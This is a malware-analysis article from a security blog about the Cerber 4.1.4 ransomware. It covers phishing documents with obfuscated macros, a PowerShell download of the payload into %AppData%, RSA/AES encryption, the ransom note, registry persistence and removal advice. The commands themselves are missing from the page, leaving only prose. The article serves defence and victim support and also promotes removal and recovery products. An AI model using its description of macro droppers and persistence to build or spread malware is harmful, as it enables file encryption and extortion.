Cerber 4.1.4 Virus Remove It and Try Decrypting Encrypted Files - How to, Technology and PC Security Forum | SensorsTechForum.com

Cerber 4.1.4 Virus Remove It and Try Decrypting Encrypted Files

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)

cerber-ransomware-4-1-4-remove-and-decrypt-your-filesOne of the most impactful ransomware viruses – Cerber has released yet another iteration of its fourth variant. The virus has applied changes in how it communicates with the C&C servers and some slight changes in the methods it infects, switching to malicious macros to conduct an infection. Regarding encryption, not much has changed and Cerber still alters the names of the encrypted files and adds a random 4 A-Z, 0-9 file extension. Anyone who has been infected by this iteration of Cerber ransomware should immediately focus on removing it from their computer instead of paying the ransom. If you are looking for alternative methods to remove Cerber by yourself and try to restore the encrypted files, we suggest you read the following article thoroughly.

Threat Summary

NameCerber 4.1.4
TypeRansomware Virus
Short DescriptionThis Cerber ransomware variant 4.1.4 encrypts files with the RSA or AES ciphers adding four randomly generated A-Z 0-9 characters(ex. .z33f) as a file extension to the encrypted files and asks a ransom payoff for decryption.
SymptomsFiles are enciphered and become inaccessible by any type of software. Several ransom notes with instructions for paying the ransom shows as a “Readme.hta” files.
Distribution MethodVia malicious macros on Microsoft Office or Adobe Reader.
Detection Tool See If Your System Has Been Affected by Cerber 4.1.4


Malware Removal Tool

Data Recovery ToolStellar Phoenix Data Recovery Technicians License(Pro version with more features) Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.
User ExperienceJoin our forum to Discuss Cerber Ransomware.

Cerber 4.1.4 – In-Depth Information

In order to make you better understand how Cerber ransomware version 4.1.4 operates, we will take you through the threat methodologically from the distribution to the final ransom payment URL.

Cerber 4.1.4’s Distribution and Infection

To cause a successful infection, the creators of Cerber 4.1.4 ransomware have most likely used the assistance of a software, known in the research field as file joiner, which combines malicious files with legitimate documents. This tool may have allowed the coders to create an obfuscated macro infection that is activated only when you enable macros on a Microsoft Office document to edit it shortly after opening it:


The procedure for spreading this malware is rather the same as most procedures. Phishing e-mails may be used to spam the user, tricking him into opening malicious documents. The documents distributing Cerber 4.1.4 are primarily in a .doc file format and they have random digit names, like the following:


Such document is uploaded alongside a fraudulent spam-message that aims to convince the user with false messages, claiming the document is important, for example:


After opening the malicious macro, the infection may execute it in an obfuscated manner, which brings us to another tool, used by the coders of Cerber 4.1.4, malware obfuscators, that avoid detection by most conventional and widely used Anti-Virus programs.

Related Article: Obfuscation in Malware – The Key to A Successful infection

The malicious macros open the Power Shell as an administrator in Windows only to quietly execute command similar to the following:


Then, the malware also makes sure to download the real payload of Cerber 4.1.4 ransomware by connecting to a remote server via anther Power Shell, command, similar to the following, reported by Bleeping Computer researchers:


As visible, Cerber ransomware’s payload is being downloaded as a file, named winx64.exe, located in the %AppData% folder.

As soon as the malicious file is downloaded, the malware automatically starts the file, so that it begins to encrypt the files of the victim.

Cerber 4.1.4 – Post-Infection Analysis

By default, Cerber ransomware has not change it’s already strong and so far unbeatable encryption. It still uses an immensely strong combination of RSA and AES encryption algorithm to scramble files of the following types:

  • Microsoft Office documents.
  • Adobe Reader files.
  • Adobe Photoshop and other Adobe software files.
  • Pictures.
  • Videos.
  • Audio files.
  • Databases.
  • Virtual machines.

After the encryption, the enciphered files still assume the very same form:cerber-ransomware-file-encrypted-sensorsrtechforum

  • No longer openable.
  • Changed names.
  • Changed file extension.

Cerber also drops it’s distinctive “Readme.hta” ransom note file which once more leads to the standard Cerber payment web page:


After this has been completed, the ransomware may either heavily modify the registry entries to run the malicious executable located in the %AppData% folder to run every-time Windows starts and encrypt newly added files or files in remote drives, such as USB sticks and others.

How to Remove Cerber 4.1.4 Virus and Try To Get Back Encrypted Files

Basically Cerber 4.1.4 is yet another variant of the so-far many Cerber variants which we have detected out in the wild. The malware is very sophisticated in what it does and researchers are yet to discover any bugs in it’s code, allowing them to crack the virus, as they did with the first variant of Cerber.

In case you are looking for methods to restore your files if they have been encoded by this nasty threat, advices are to immediately act and remove it safely, using the instructions below. You can try and remove it manually, but we strongly recommend using a professional malware removal tool to do the job for you swiftly and safely.

After removing Cerber, we have offered several alternative suggestions that may help you try to recover your non-openable files. We are constantly researching for newer and newer data recovery methods that will help you recover your files. Since sophisticated malware like Cerber deletes the files with several passes, it is very difficult to scrape up a solution that is 100% effective. Still, we will keep researching and fighting the fight against this nasty threat and update this article with more information if a decryptor is released, so we advise following our blog regularly.


Ventsislav Krastev

Ventsislav has been covering the latest malware, software and newest tech developments at SensorsTechForum for 3 years now. He started out as a network administrator. Having graduated Marketing as well, Ventsislav also has passion for discovery of new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management and then Network Administration, he found his passion within cybersecrurity and is a strong believer in basic education of every user towards online safety.

More Posts - Website

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Share on Twitter Tweet
Share on Google Plus Share
Share on Linkedin Share
Share on Digg Share
Share on Reddit Share
Share on Stumbleupon Share